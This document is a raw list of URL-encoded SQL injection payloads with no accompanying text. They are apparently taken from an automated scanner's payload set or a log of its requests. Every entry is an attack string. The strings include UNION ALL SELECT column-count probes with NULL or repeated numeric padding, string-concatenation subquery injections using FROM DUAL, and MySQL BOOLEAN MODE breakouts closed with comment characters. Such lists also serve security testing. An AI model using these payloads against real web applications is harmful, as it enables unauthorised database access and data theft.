-2060%27%20%2B%20%28SELECT%20%27PePT%27%20FROM%20DUAL%20WHERE%205029%3D5029%20UNION%20ALL%20SELECT%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%23%20%29%20%2B%20%27 -6032%27%20%2B%20%28SELECT%20%27FPIN%27%20FROM%20DUAL%20WHERE%206540%3D6540%20UNION%20ALL%20SELECT%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%2C%206540%23%20%29%20%2B%20%27 -6805%27%20%2B%20%28SELECT%20%27rZuK%27%20WHERE%205913%3D5913%20UNION%20ALL%20SELECT%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%2C%205913%23%20%29%20%2B%20%27 -7215%27%20%2B%20%28SELECT%20%27yATJ%27%20WHERE%208373%3D8373%20UNION%20ALL%20SELECT%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%2C%208373%23%20%29%20%2B%20%27 -5741%27%20%2B%20%28SELECT%20%27QZeN%27%20WHERE%204541%3D4541%20UNION%20ALL%20SELECT%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%23%20%29%20%2B%20%27 -3663%27%20%2B%20%28SELECT%20%27JiAK%27%20WHERE%201776%3D1776%20UNION%20ALL%20SELECT%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%2C%201776%23%20%29%20%2B%20%27 -1543%27%20%2B%20%28SELECT%20%27Jgwi%27%20WHERE%207039%3D7039%20UNION%20ALL%20SELECT%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%2C%207039%23%20%29%20%2B%20%27 -4856%27%20%2B%20%28SELECT%20%27tBJA%27%20WHERE%206079%3D6079%20UNION%20ALL%20SELECT%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%2C%206079%23%20%29%20%2B%20%27 -9267%27%20%2B%20%28SELECT%20%27tkvU%27%20WHERE%206355%3D6355%20UNION%20ALL%20SELECT%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%2C%206355%23%20%29%20%2B%20%27 -1851%27%20%2B%20%28SELECT%20%27YHsJ%27%20WHERE%205257%3D5257%20UNION%20ALL%20SELECT%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%23%20%29%20%2B%20%27 -5716%27%20%2B%20%28SELECT%20%27PNIy%27%20WHERE%203555%3D3555%20UNION%20ALL%20SELECT%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%23%20%29%20%2B%20%27 -3400%27%20%2B%20%28SELECT%20%27Qvex%27%20WHERE%208290%3D8290%20UNION%20ALL%20SELECT%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%23%20%29%20%2B%20%27 -9704%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%2C%207757%23%20%23 -3504%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%23%20%23 -2766%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%23%20%23 -2989%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%23%20%23 -6111%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%2C%206691%23%20%23 -5721%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%2C%202768%23%20%23 -7914%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%2C%205968%23%20%23 -2921%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%23%20%23 -4048%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%2C%203412%23%20%23 -8867%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%2C%206822%23%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 